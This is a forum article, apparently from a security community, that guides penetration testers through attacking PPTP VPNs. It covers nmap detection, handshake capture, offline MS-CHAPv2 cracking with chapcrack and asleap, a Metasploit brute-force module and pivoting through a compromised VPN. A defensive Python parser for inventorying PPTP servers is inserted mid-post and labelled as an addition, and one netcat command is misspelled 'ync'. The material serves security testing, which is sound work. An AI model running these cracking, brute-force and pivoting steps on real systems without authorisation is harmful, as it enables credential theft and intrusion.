
Article: PPTP - Port 1723

stihl

Moderator

Basic info

The Point-to-Point Tunneling Protocol (PPTP) is a network protocol used to implement virtual private networks (VPNs). While PPTP has been widely adopted due to its ease of configuration and speed, it is notoriously vulnerable. Understanding how to identify, test, and exploit these vulnerabilities is essential for penetration testers.

This guide covers in-depth technical methods to identify, analyze, and exploit PPTP, allowing security professionals to perform accurate vulnerability assessments and simulate real-world attack vectors.

Understanding the PPTP Protocol Structure

PPTP uses the following components:


  • TCP Port 1723: For control messages

  • GRE (Generic Routing Encapsulation): Protocol number 47, used to encapsulate PPP frames
Misconfigured or poorly filtered GRE traffic can lead to exploitable situations where the attacker intercepts or manipulates the VPN communication.

Authentication Mechanisms and Weaknesses

PPTP uses Microsoft’s Point-to-Point Encryption (MPPE) combined with MS-CHAPv1 or MS-CHAPv2. Both have critical weaknesses.

MS-CHAPv2 Authentication Vulnerabilities

  • Susceptible to dictionary attacks

  • Challenge-response mechanisms can be captured and cracked

  • NT Hash is derived from the user password, allowing offline brute-force

Identifying PPTP Services During Network Reconnaissance

Nmap Scanning for PPTP Detection

To identify active PPTP services, use the Nmap port scanner targeting TCP port 1723:


Код:
nmap -sS -p 1723 --script pptp-version <target-ip>

Look for:


  • Open port 1723 (PPTP control channel)

  • OS fingerprinting to detect routers or VPN appliances

Banner Grabbing

Use Netcat to manually interact with the PPTP port:


Код:
ync <target-ip> 1723

A PPTP server typically responds with GRE negotiation identifiers.
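The control-channel exchange described above (TCP 1723, Start-Control-Connection-Request and -Reply as laid out in RFC 2637) is also what a defender can parse from captured TCP/1723 server traffic to inventory PPTP servers still present on a network, so that endpoints relying on the weak MS-CHAPv2/MPPE stack can be found and decommissioned. This is an added example, not code from the post; the sample reply, host name and vendor string are constructed.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# RFC 2637 control message header: Length, PPTP Message Type, Magic Cookie, Control Message Type, Reserved
PPTP_MAGIC_COOKIE = 0x1A2B3C4D
PPTP_CONTROL_MESSAGE = 1
SCCRQ, SCCRP = 1, 2  # Start-Control-Connection-Request / -Reply
CTRL_NAMES = {1: "SCCRQ", 2: "SCCRP", 3: "StopCCRQ", 4: "StopCCRP", 5: "Echo-Request", 6: "Echo-Reply"}

@dataclass
class PptpControlInfo:
    ctrl_type: int
    name: str
    version: Optional[str] = None  # only filled for SCCRQ / SCCRP
    hostname: Optional[str] = None
    vendor: Optional[str] = None

def parse_pptp_control(payload: bytes) -> Optional[PptpControlInfo]:
    """Return control-message details if payload is one PPTP control message, else None."""
    if len(payload) < 12:
        return None
    length, msg_type, cookie, ctrl_type, _reserved = struct.unpack("!HHIHH", payload[:12])
    if msg_type != PPTP_CONTROL_MESSAGE or cookie != PPTP_MAGIC_COOKIE or length != len(payload):
        return None
    info = PptpControlInfo(ctrl_type, CTRL_NAMES.get(ctrl_type, f"type-{ctrl_type}"))
    # SCCRQ and SCCRP share a 156-byte layout: version at offset 12, host name at 28, vendor at 92
    if ctrl_type in (SCCRQ, SCCRP) and length >= 156:
        ver = struct.unpack("!H", payload[12:14])[0]
        info.version = f"{ver >> 8}.{ver & 0xFF}"
        info.hostname = payload[28:92].split(b"\x00", 1)[0].decode("ascii", "replace")
        info.vendor = payload[92:156].split(b"\x00", 1)[0].decode("ascii", "replace")
    return info

def build_sccrp(hostname: bytes, vendor: bytes) -> bytes:
    """Constructed sample Start-Control-Connection-Reply (version 1.0, result code 1 = OK)."""
    body = struct.pack("!HBBIIHH", 0x0100, 1, 0, 1, 1, 1, 0)  # version, result, error, framing, bearer, channels, firmware
    body += hostname.ljust(64, b"\x00") + vendor.ljust(64, b"\x00")
    return struct.pack("!HHIHH", 12 + len(body), PPTP_CONTROL_MESSAGE, PPTP_MAGIC_COOKIE, SCCRP, 0) + body

def inventory_pptp_servers(flows):
    """flows: iterable of (server_ip, server-to-client TCP/1723 payload); returns servers that sent a valid SCCRP."""
    found = {}
    for server_ip, payload in flows:
        info = parse_pptp_control(payload)
        if info is not None and info.ctrl_type == SCCRP:
            found[server_ip] = info
    return found
```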


Capturing and Cracking MS-CHAPv2 Handshakes

Tools for PPTP Handshake Capture

Use a Man-in-the-Middle approach or capture with Wireshark on port 1723 and GRE:


Код:
tcpdump -i eth0 port 1723 or proto gre -w pptp_handshake.pcap

Cracking with chapcrack and asleap

  1. Extract challenge and response:

    Code:
    chapcrack -i pptp_handshake.pcap -o challenge_response.txt

  2. Crack using asleap:

    Code:
    asleap -C <challenge> -R <response> -W /path/to/wordlist

This enables offline cracking of MS-CHAPv2 handshakes using known dictionaries.


Exploiting PPTP Using Metasploit

Metasploit includes auxiliary modules for PPTP brute-force:

Code:
use auxiliary/scanner/vpn/pptp_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

You can combine this with previously cracked NTLM hashes to validate credentials.


VPN Pivoting After PPTP Access

After compromising PPTP, attackers can establish a VPN session and pivot into internal networks.

Use tools like pptpsetup or pppd to establish the session:

Code:
pptpsetup --create pptpvpn --server <target-ip> --username user --password pass --encrypt
pon pptpvpn

Confirm GRE tunneling is established and route internal traffic through the VPN interface.

